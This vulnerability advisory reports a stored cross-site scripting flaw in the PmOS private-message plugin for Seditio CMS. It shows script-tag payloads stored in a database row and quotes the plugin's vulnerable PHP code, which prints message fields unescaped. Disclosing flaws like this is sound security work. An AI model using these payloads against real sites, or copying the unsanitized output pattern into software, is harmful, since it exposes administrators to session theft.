PmOS - Pm Okuma Sistemi Cross Site Scripting

`============================================================================  
Vulnerable Software: PmOS - Pm Okuma Sistemi [plugin for Seditio CMS].  
http://seditio-eklenti.com/datas/users/1-pmoku.rar (MD5 SUM: 88235c2b4b0613bff87545d2d887f042 *1-pmoku.rar)  
http://seditio-eklenti.com/seditio-pm-okuma-eklentisi-d46.html  
============================================================================  
About Software:  
PmOS - Pm Okuma Sistemi [plugin for Seditio CMS]  
gives ability to administrators to read anothers PM's (Private messages)  
============================================================================  
Tested:  
With: Seditio 165  
  
*php.ini MAGIC_QUOTES_GPC OFF*  
Safe mode off  
/*  
OS: Windows XP SP2 (32 bit)  
Apache: 2.2.21.0  
PHP Version: 5.2.17.17  
mysql> select version()  
-> ;  
+-----------+  
| version() |  
+-----------+  
| 5.5.21 |  
+-----------+  
*/  
============================================================================  
Vuln Desc:  
Due Insufficent sanitization this plugin is prone Cross Site Scripting Vulnerability(Persistent Cross Site Scripting vuln)  
============================================================================  
  
No sanitization when fetching data from database.  
And thanks to Seditio cms again! It stores private message body in database without any sanitization:  
  
===========================================================================  
mysql> select * from sed_pm \G  
*************************** 1. row ***************************  
pm_id: 6  
pm_state: 0  
pm_date: 1334009749  
pm_fromuserid: 1  
pm_fromuser: admin  
pm_touserid: 1  
pm_title: <script>alert(1);</script>  
pm_text: <script>alert(2);</script>  
1 row in set (0.00 sec)  
  
mysql>  
===========================================================================  
  
Due trust to this issuse pmoku plugin is vulnerable to XSS.  
Vulnerable code section(From bottom: $pm_text = $row['pm_text']; will become unsanitized)  
//plugins/pmoku/pmoku.admin.php  
----------------------------------------Snip ------------------------------------  
$sql = sed_sql_query("SELECT * FROM sed_pm ORDER by pm_date DESC LIMIT 0,50");  
  
$plugin_body .= "<h4>".$L['editdeleteentries']." :</h4>";  
$plugin_body .= "<table class=\"cells\"><tr>";  
$plugin_body .= "<td class=\"coltop\">".$L['Delete']."</td>";  
$plugin_body .= "<td class=\"coltop\">Tarih</td>";  
$plugin_body .= "<td class=\"coltop\">Gцnderen</td>";  
$plugin_body .= "<td class=\"coltop\">Konu</td>";  
$plugin_body .= "<td class=\"coltop\">Mesaj</td>";  
$plugin_body .= "<td class=\"coltop\">Alan</td>";  
$plugin_body .= "</tr>";  
  
while ($row = sed_sql_fetcharray($sql))  
{  
$pm_id = $row['pm_id'];  
$pm_date = @date($cfg['dateformat'], $row['pm_date'] + $usr['timezone'] * 3600);  
$pm_fromuser = $row['pm_fromuser'];  
$pm_title = $row['pm_title'];  
$pm_text = $row['pm_text'];  
$pm_touserid = $row['pm_touserid'];  
$plugin_body .= "<form id=\"saveallowlist_".$allowlist_id."\" action=\"admin.php?m=tools&p=adminallow&a=update&id=".$allowlist_id."\" method=\"post\">";  
$plugin_body .= "<tr><td style=\"text-align:center;\">[<a href=\"admin.php?m=tools&p=pmoku&a=delete&id=".$pm_id."&".sed_xg()."\">x</a>]</td>";  
  
  
$plugin_body .= "<td>$pm_date</td>";  
$plugin_body .= "<td>$pm_fromuser</td>";  
$plugin_body .= "<td>$pm_title</td>";  
$plugin_body .= "<td>$pm_text</td>";  
$plugin_body .= "<td>$pm_touserid</td>";  
$plugin_body .= "<td><input type=\"submit\" class=\"submit\" value=\"".$L['Update']."\" /></td></tr></form>";  
}  
$plugin_body .= "</table>";  
------------------------------EOF Snip ------------------------------------  
  
Print screen:  
http://s019.radikal.ru/i617/1204/b2/9c434fd50926.png  
  
  
Special Thanks 2 MeTaiZm & 2 All AA Team.  
+++++ Greetz to all ++++++  
packetstormsecurity.*,securityfocus.com,cxsecurity.com,security.nnov.ru,securtiyvulns.com and to all others!  
`